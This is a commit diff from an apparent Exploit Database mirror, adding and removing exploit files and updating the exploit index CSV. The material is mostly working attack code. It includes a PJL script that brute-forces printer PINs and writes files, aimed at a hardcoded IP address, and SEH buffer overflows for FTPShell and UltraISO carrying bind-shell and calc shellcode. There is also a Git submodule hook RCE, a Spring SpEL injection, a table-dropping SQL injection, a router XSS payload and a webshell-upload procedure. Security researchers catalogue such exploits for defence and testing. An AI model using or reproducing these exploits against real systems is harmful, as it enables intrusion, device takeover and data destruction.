bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-09-06

Browse source 
18 changes to exploits/shellcodes

Microsoft people 10.1807.2131.0 - Denial of service (PoC)

GNU glibc < 2.27 - Local Buffer Overflow

UltraISO 9.7.1.3519 - Buffer Overflow (SEH)

JBoss 4.2.x/4.3.x - Information Disclosure

Git < 2.17.1 - Remote Code Execution

FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution

FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)

Monstra CMS 3.0.4 - Remote Code Execution

OpenDaylight - SQL Injection
Tenda ADSL Router D152 - Cross-Site Scripting

Pivotal Spring Java Framework < 5.0 - Remote Code Execution
This commit is contained in:
Offensive Security 2018-09-06 05:01:55 +00:00
parent 14bdc56535
commit 32f471140a
12 changed files with 203 additions and 307 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

94
exploits/hardware/remote/45332.py Executable file
View file

@ -0,0 +1,94 @@
# Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution
# Date: 2018-09-05
# Exploit Author: vr_system
# Vendor Homepage: https://www.fujixerox.com.cn/
# Software Link: https://www.fujixerox.com.cn/
# Version: DocuCentre-IV,DocuCentre-VI,DocuCentre-V,ApeosPort-VI,ApeosPort-V
# Tested on: DocuCentre-V 3065,ApeosPort-VI C3371,ApeosPort-V C4475,ApeosPort-V C3375,DocuCentre-VI C2271,ApeosPort-V C5576,DocuCentre-IV C2263,DocuCentre-V C2263,ApeosPort-V 5070
# CVE : N/A
# POCAbility to write files to the printer
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import socket
import time
PJL_START = "\033%-12345X@PJL "
PJL_FINISH = "\033%-12345X\r\n"
def Buildsocket(ip,port=9100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.settimeout(5)
try:
sock.connect((ip, port))
except:
print "[!*]-ip-%s-can't connect--" % ip
return 'error'
for i in range(500):
print"bypass pin:{0}".format(i)
PJL_INFO_ID = """JOB PASSWORD={0}\r\n""".format(i)
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """DEFAULT PASSWORD=0\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """DEFAULT CPLOCK=OFF\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """DEFAULT DISKLOCK=OFF\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
PJL_INFO_ID = """FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/test4"\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:
device = sock.recv(1024)
except:pass
PJL_INFO_ID = """FSUPLOAD NAME="0:/test4" OFFSET=0 SIZE=4\r\n"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:
device = sock.recv(1024)
except:pass
finally:
sock.close()
print "OK"
if __name__ == '__main__':
ip = "118.42.125.192"
Buildsocket(ip, port=9100)
# POCAbility to view files in the printer
##!/usr/bin/env python
# -*- coding: UTF-8 -*-
import socket
PJL_START = "\033%-12345X@PJL "
PJL_FINISH = "\033%-12345X\r\n"
def Buildsocket(ip, port=9100):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.settimeout(5)
try:
sock.connect((ip, port))
except:
print "[!*]-ip-%s-can't connect--" % ip
return 'error'
PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID)
try:
device = sock.recv(1024)
except:pass
PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1"""
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH
sock.send(DEVICEID) #
try:
device = sock.recv(1024)
except:
return 'No'
print "[!*]-ip-%s-is-ok\r\ndeviceidis-%s" % (str(ip), device)
sock.close()
return 'OK'
if __name__ == '__main__':
Buildsocket("118.42.125.192", port=9100)

15
exploits/hardware/webapps/45336.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Tenda D152 ADSL Router - Cross-Site Scripting
# Exploit Author: Sandip Dey
# Date: 2018-07-21
# Vendor Homepage: http://www.tendacn.com
# Hardware Link: https://www.amazon.in/Tenda-D152-ADSL2-Modem-Router/dp/B00IM8CWTE/ref=sr_1_fkmr0_1?ie=UTF8&qid=1536170904&sr=8-1-fkmr0&keywords=Tenda+D152+ADSL+router
# Category: Hardware
# Tested on: Windows 8.1
# CVE: CVE-2018-14497
# Reproduction Steps:
Goto your Wifi Router Gateway [i.e: http://Target]
Go to --> "General Setup" --> "Wireless" --> "Basic Settings
Now change the SSID to <script>alert("Sandip")</script> and hit apply
Refresh the page, and you will get the "Sandip" pop-up

22
exploits/java/webapps/44747.txt
View file

@ -1,22 +0,0 @@
# Exploit Title: OpenDaylight SQL Injection
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.opendaylight.org
# CVE: CVE-2018-1132
intro:
OpenDaylight (ODL) is a modular open platform for customizing and automating networks of any size and scale. The OpenDaylight Project arose out of the SDN movement, with a clear focus on network programmability. It was designed from the outset as a foundation for commercial solutions that address a variety of use cases in existing network environments.
attackers can SQL inject the component's database(SQLite) without authenticating to the controller or SDNInterfaceapp.
The bug is in /impl/src/main/java/org/opendaylight/sdninterfaceapp/impl/database/SdniDataBase.java (line 373~391)
The SDNI concats port information to build an insert SQL query, and it executes the query in SQLite.
However, in line 386, the portName is a string that can be customized by switches. Since SQLite supports multiple sql queries in one run,
attackers can customize the port name to inject another SQL if they compromise or forge a switch.
POC:
For example, he can set portName as:
");drop table NAME;//

28
exploits/java/webapps/44796.txt
View file

@ -1,28 +0,0 @@
# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
# Date: 2018-05-28
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE: CVE-2018-1270
# Version: <= 5.0.x
# Description: By connecting to spring STOMP, and putting the key for "selector"
# header, we can execute code on Spring.
# POC:
# Here' we are writting java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);
stompClient.connect({}, function (frame){
setConnected(true);
console.log('Connected: ' + frame);
stompClient.subscribe('/topic/greetings', function(greeting){
showGreeting(JSON.parse(greeting.body).content);
},header);
});

36
exploits/linux/local/44750.txt
View file

@ -1,36 +0,0 @@
# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237
# POC:
$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>
#define N 97699
char a[N];
char b[N+128];
int
main (void)
{
memset (a, 'x', N);
char *c = mempcpy (b, a, N);
assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
The problem is these two lines in memmove-avx512-no-vzeroupper.S:
vmovups %zmm4, (%rax)
vmovups %zmm5, 0x40(%rax)
For mempcpy, %rax points to the end of the buffer.

54
exploits/linux/remote/44822.txt
View file

@ -1,54 +0,0 @@
# Exploit Title: Git (code execution)
# Date: 2018-05-29
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>
# CVE: CVE-2018-11235
#Version: <=2.17.1
# Tested on Kali Linux
P0C:
Create two files:
pwned.sh: the file which will contain our commands to be executed
commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file
add the follwing to Pwned.sh:
#!/bin/sh
cat << EOF
#here we can put our lovely commands
Exploited! : $(ifconfig)
EOF
#--------
Add the follwing to commit.sh file:
#!/bin/sh
set -e
repo_dir="$PWD/repo"
#change it to any other Repo
repo_submodule='https://github.com/JameelNabbo/SmartWorm'
git init "$repo_dir"
cd "$repo_dir"
git submodule add "$repo_submodule" pwned
mkdir modules
cp -r .git/modules/pwned modules
cp ../pwned.sh modules/pwned/hooks/post-checkout
git config -f .gitmodules submodule.pwned.update checkout
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned
git add modules
git submodule add "$repo_submodule"
git add SmartWorm
git commit -am pwned
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`”
——————
Solution:
https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html

85
exploits/multiple/remote/44009.c
View file

@ -1,85 +0,0 @@
# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X
# Date: 02/08/2018
# Exploit Author: JameelNabbo
# Vendor Homepage: http://www.jboss.org <http://www.jboss.org/>
# Software Link: http://jbossas.jboss.org/downloads <http://jbossas.jboss.org/downloads>
# Version: 4.2X. & 4.3.X
# Tested on: Linux Ubuntu
# CVE : CVE-2010-1429
1. Description
By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address.
Example: http://127.0.01/status?full=true
2. Proof of Concept
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
int socket_connect(char *host, in_port_t port){
struct hostent *hp;
struct sockaddr_in addr;
int on = 1, sock;
if((hp = gethostbyname(host)) == NULL){
herror("gethostbyname");
exit(1);
}
bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
if(sock == -1){
perror("setsockopt");
exit(1);
}
if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
perror("connect");
exit(1);
}
return sock;
}
#define BUFFER_SIZE 1024
int main(int argc, char *argv[]){
int fd;
char buffer[BUFFER_SIZE];
if(argc < 3){
fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
exit(1);
}
fd = socket_connect(argv[1], atoi(argv[2]));
write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
fprintf(stderr, "%s", buffer);
}
shutdown(fd, SHUT_RDWR);
close(fd);
return 0;
}
3. Solution :
Update to version 4.2.3 or later

23
exploits/php/webapps/44621.txt
View file

@ -1,23 +0,0 @@
# Exploit Title: Monstra CMS 3.0.4 Upload Plugin Remote code execution CVE-2018-9037
# Date: 2018-05-14
# Exploit Author: Jameel Nabbo
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: MAC OSX
# CVE :CVE-2018-9037
Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file,
which is automatically extracted and may contain .php files.
Steps to Reproduce
1: Log in as a user with page editing permissions
2: Upload a plugin archive containing php webshell code
3: After successful upload we can execute the command.
Then go to: http://127.0.0.1/plugins/{Name_Of_Zip_File_You_Uploaded}/{File_In_Zip}.php
Solution
Filter plugin content during plugin upload

36
exploits/windows_x86-64/dos/45335.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Microsoft people 10.1807.2131.0 - Denial of service (PoC)
# Exploit Author : L0RD
# Contact: borna.nematzadeh123@gmail.com
# Date: 2018-09-04
# Vendor Homepage : https://www.microsoft.com
# Software link: https://www.microsoft.com/en-us/p/microsoft-people/9nblggh10pg8?activetab=pivot:overviewtab
# Version: <= 10.1807.2131.0
# Tested on: Windows 10
# CVE: N/A
# Description:
# Microsoft people desktop application is a contact management app and
# address book included in Microsoft's Windows 8 and 10.
# It allows a user to organize and link contacts from different email
# accounts with a unique graphical interface
# More information :
# https://support.microsoft.com/en-us/help/14103/windows-people-app-help
# Steps to reproduce:
# 1) Run the python exploit code and copy content of file.
# 2) Open people application
# 3) Click on "new contact (+)" and paste content of "poc.txt" into name filed and save contact
# 4) Crash!
#!/usr/bin/python
buffer = "\x41" * 20000
payload = buffer
try:
f=open("poc.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

52
exploits/windows_x86-64/local/45278.py
View file

@ -1,52 +0,0 @@
# Exploit Title: UltraISO 9.7.1.3519 - Buffer Overflow (SEH)
# Date: 2018-08-23
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Vendor Homepage: https://www.ultraiso.com
# Software Link Download : https://www.ultraiso.com/download.html
# Tested on: Windows 7 Ultimate - 64-bit
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new
# 2. File with the name "exploit.txt" just copy the text inside "exploit.txt"
# 3. start the UltraISO program.
# 4. In the new window click "Tools" > "Mount To Virtual Drive" .
# 5. Now Paste the content of "exploit.txt" into the field: " Image File ".
# 6. Click "Mount" and you will see a lot of calculators.
# Thanks: corelanc0d3r and PeaceMaker
#!/usr/bin/env python
#Badchars \x00\x0a\x0d
shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
#Exit intermodular call
shellcode += "\xB8\x8A\x70\xA0\xFF\xF7\xD8\x50\xC3"
fill = "\x42" * (126 - len(shellcode))
junk = "A" * (1064 - len(shellcode) - len(fill))
#0x005540e9 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [UltraISO.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v9.7.1.3519 (C:\Program Files (x86)\UltraISO\UltraISO.exe)
sjmp = "\xeb\x80\xCC\xCC"
seh = "\xe9\x40\x55"
spirit = junk + shellcode + fill + sjmp + seh
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(spirit)
f.write(spirit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

54
exploits/windows_x86/remote/45333.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-04
# Vendor Homepage: http://www.ftpshell.com/
# Software Link: http://www.ftpshell.com/downloadserver.htm
# Tested Version: 6.80
# Vulnerability Type: Buffer Overflow (SEH) Local
# Tested on OS: Windows XP Professional SP3 x86 es
# Steps to Produce the Buffer Overflow (SEH):
# 1.- Run python code : FTPShell_Server_6.80.py
# 2.- Open FTPShell_Server_6.80.txt and copy content to clipboard
# 3.- Open FTPShell Server Administrator
# 4.- Manage FTP Accounts...
# 5.- Add Account Name
# 6.- Paste ClipBoard on "Account name to ban"
# 7.- OK
#!/usr/bin/env python
#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
shellcode = (
"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")
nSEH = "\xEB\x06\x90\x90"
SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI
buffer = "\x41" * 1268 + nSEH + SEH + shellcode
f = open ("FTPShell_Server_6.80.txt", "w")
f.write(buffer)
f.close()

11
files_exploits.csv
View file

@ -5256,6 +5256,7 @@ id,file,description,date,author,type,platform,port
43720,exploits/windows/dos/43720.js,"Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read",2018-01-17,"Google Security Research",dos,windows,
43723,exploits/windows/dos/43723.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy",2018-01-17,"Google Security Research",dos,windows,
43776,exploits/hardware/dos/43776.py,"Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service",2018-01-18,"Scott Gayou",dos,hardware,
45335,exploits/windows_x86-64/dos/45335.txt,"Microsoft people 10.1807.2131.0 - Denial of service (PoC)",2018-09-05,L0RD,dos,windows_x86-64,
43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos,
43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows,
43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows,
@ -9855,7 +9856,6 @@ id,file,description,date,author,type,platform,port
44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows,
44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows,
44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows,
44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android,
44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
@ -9930,7 +9930,6 @@ id,file,description,date,author,type,platform,port
45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86,
45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86,
45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows,
45278,exploits/windows_x86-64/local/45278.py,"UltraISO 9.7.1.3519 - Buffer Overflow (SEH)",2018-08-28,"Shubham Singh",local,windows_x86-64,
45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows,
45288,exploits/linux/local/45288.py,"SIPP 3.3 - Stack-Based Buffer Overflow",2018-08-29,"Juan Sacco",local,linux,
45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
@ -16451,7 +16450,6 @@ id,file,description,date,author,type,platform,port
44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows,
44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows,
@ -16720,7 +16718,6 @@ id,file,description,date,author,type,platform,port
44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
44950,exploits/unix/remote/44950.rb,"Quest KACE Systems Management - Command Injection (Metasploit)",2018-06-27,Metasploit,remote,unix,
@ -16749,6 +16746,7 @@ id,file,description,date,author,type,platform,port
45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80
45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80
45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware,
45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
@ -16763,6 +16761,7 @@ id,file,description,date,author,type,platform,port
45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux,
45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple,
45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix,
45333,exploits/windows_x86/remote/45333.py,"FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)",2018-09-05,"Luis Martínez",remote,windows_x86,
45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
@ -39583,7 +39582,6 @@ id,file,description,date,author,type,platform,port
44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community 2.2.0 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php,
44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php,
44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,
44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
@ -39667,7 +39665,7 @@ id,file,description,date,author,type,platform,port
44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp,
44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,
44747,exploits/java/webapps/44747.txt,"OpenDaylight - SQL Injection",2018-05-24,JameelNabbo,webapps,java,
45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware,
44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php,
44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux,
44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux,
@ -39699,7 +39697,6 @@ id,file,description,date,author,type,platform,port
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php,
44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
